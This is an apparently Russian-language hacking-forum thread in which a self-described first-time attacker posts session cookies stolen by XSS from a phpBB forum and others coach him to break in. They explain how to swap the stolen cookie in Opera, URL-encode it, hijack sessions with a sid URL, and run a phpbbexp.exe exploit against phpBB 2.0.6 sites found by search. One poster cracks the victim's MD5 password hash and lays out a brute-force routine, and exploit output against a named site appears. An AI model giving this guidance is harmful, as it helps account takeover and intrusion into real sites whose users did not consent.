Удалось вот эту инфу украсть

QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:2:"17";}; phpbb2mysql_sid=9e4372133ffcbf434cd7af86903b2921; phpbb2mysql_t=a:1:{i:47;i:1131132144;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)



Что дальше надо делать?

Заменить свое этим...

Можно по-подробней, что надо делать...
Это мой первый взлом форума.

Если 1й то попробый найти phpbbexp.exe и форум в яндексе или google.ru Powered by phpbb 2.0.6
потом Пуск>Выполнить там введи cmd и в командной строке выполни phpbbexp.exe http://***.ru*/forum/ 1 1
и у тя будет полный доступ в админ панель :)

Shapka

Это не куки админа, это куки пользователя, который имеет доступ в закрытые разделы.

Значит, мне надо
1)скачать прогу phpbbexp.exe
2) что надо искать в yandex.ru ? зачем мне Powered by phpbb 2.0.6 , у меня же движок 2,0,17

смени свои куки(как чиатй на сайте на форуме )

africanec

дело в том, что когда программой cookie editor я ещу куки этого форума, то у меня выходит только кукие с именем phpbb2mysql_data , а вот phpbb2mysql_sid отсутствует...
мне надо самому его создать?

Shapka
эта прога дала результат

_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... c29c339ae827878a16fc19498440ef14
http://*****/forum/?sid=c29c339ae827878a16fc19498440ef1
_ recuperation du nom de la table sql ... can't find

поставь себе оперу и меняй все там просто и удобно

Удалось вот эту инфу украсть

QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:2:"17";}; phpbb2mysql_sid=9e4372133ffcbf434cd7af86903b2921; phpbb2mysql_t=a:1:{i:47;i:1131132144;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)



Что дальше надо делать?


Э тебя ничего не выйдет-у чувака не был проставлен автологин, видишь в куках хэша нет...

А так...если ты украл нормальные куки, то у тебя есть 2способа:
1)расшифровать хэш
2)как уже говорили, ставишь оперу, и меняешь в куках phpbb2mysql_data на украденный, phpbb2mysql_sid не нужно менять. Только не забудь перекодировать куки.

Ван
А если чеё-нибудь хэш украду, то мне его подставлять в куки или расшифровывать надо?

Можно и замутить куки, вставив в них хэш и id юзера, а можно и расшифровать и получить пароль в чистом виде.

->перекодировать куки - это как?

такс... вот что получил нового

QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"25d55ad283aa400af464c76d713c07ad";s:6:"userid";s:2:"17";}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"25d55ad283aa400af464c76d713c07ad";s:6:"userid";i:17;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

короче, http://*****/forum/?sid=c29c339ae827878a16fc19498440ef1 это есть sid адресс сессии, чисти кукиес у своей Мозилки и вводи это адресной строке, и если форум дырявый то ты залогинишься автоматом под админом...
Вообще я рекомендую начать с форума 2.0.6 они дырявые насквозь есть и ты на них научишься некоторым азам... а потом переходить на более новые версии

http://webmastertools.narod.ru/OnlineTools/url_decode.html - десь перекодировать куки. Например, у тебя было:
a:2:{s:11:"autologinid";s:32:"25d55ad283aa400af464c76d713c07ad";s:6:"userid";i:17;}
А перекодировалось в: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2225d55ad283aa400af464c76d713c07ad%22%3Bs%3A6%3A%2 2userid%22%3Bi%3A17%3B%7D
(Это и надо вставлять в опере).

В куках хранится хэш пароля. В твоих куках хэш:25d55ad283aa400af464c76d713c07ad
Берём прогу PasswordsPro, и брутим или перебираем по словарику. В твоём случае пароль лёгкий: 12345678
Удачи.

З.Ы.Можно мне репутацию поднять...

Shapka
Да я не собираюсь хакером быть, мне просто надо получить информацию с того форума.
С сессиями ничего не вышло.

25d55ad283aa400af464c76d713c07ad

12345678

Ван
спасибо за помощь.

опера сама декодирует вроде сроду некодировал куки

короче смотри украасть хэш это урасть пароль закодированный в MD5 его потом расшифравать надо... используй для этого propass скачать можно на www.web-hack.ru скорость перебора у нее 4,500,000 комбинаций в секунду....
1. Мои рекомендации, вначале атакуй брутфорсом длинна пароля от1 до 9 символов, вначале перебери все цифры(0123456789)...
2. потом делай атаку брутфорсом но по буквам(qwertyuuioplkjhgfdsazxcvbnm) я их не по порядку указал... вот перебирай примерно 5-8мин, если пароль все еще не надешь 3. делай вот что делай снова атаку брутфорсом по буквам и цифрам(0123456789qwertyuioplkjhgfdsazxcvbnm) перебирай примерно 5-8мин
Таким способом я расшифровал 98 паролей и 121(из ворованого дампа Мускульной базы одного сайта)

Shapka
С моим GPRS брутсофт бесполезен.
Я просто XSS через картинку сделал, а вот дальше что делать не знал.
Всем спасибо за помощь, по респекту.

Видео с сайта качай там все показано

Я иммею ввиду не брутфорс в инете, а когда ты урадешь хэш то его надо расшифровать... это делается не в инете а локальная машина

Подскажите что за бойда почемуто ни че не получается!

D:\Documents and Settings\1>c:\phpbbexp.exe http://talk.sapience.ru/ 1 1
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 62420f6ee65081679c1ad6bced950ee4
http://talk.sapience.ru/?sid=62420f6ee65081679c1ad6bced950ee4
_ recuperation du nom de la table sql ... can't find

Подскажите что за бойда почемуто ни че не получается!

D:\Documents and Settings\1>c:\phpbbexp.exe http://talk.sapience.ru/ 1 1
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 62420f6ee65081679c1ad6bced950ee4
http://talk.sapience.ru/?sid=62420f6ee65081679c1ad6bced950ee4
_ recuperation du nom de la table sql ... can't find

Форум пропатченный.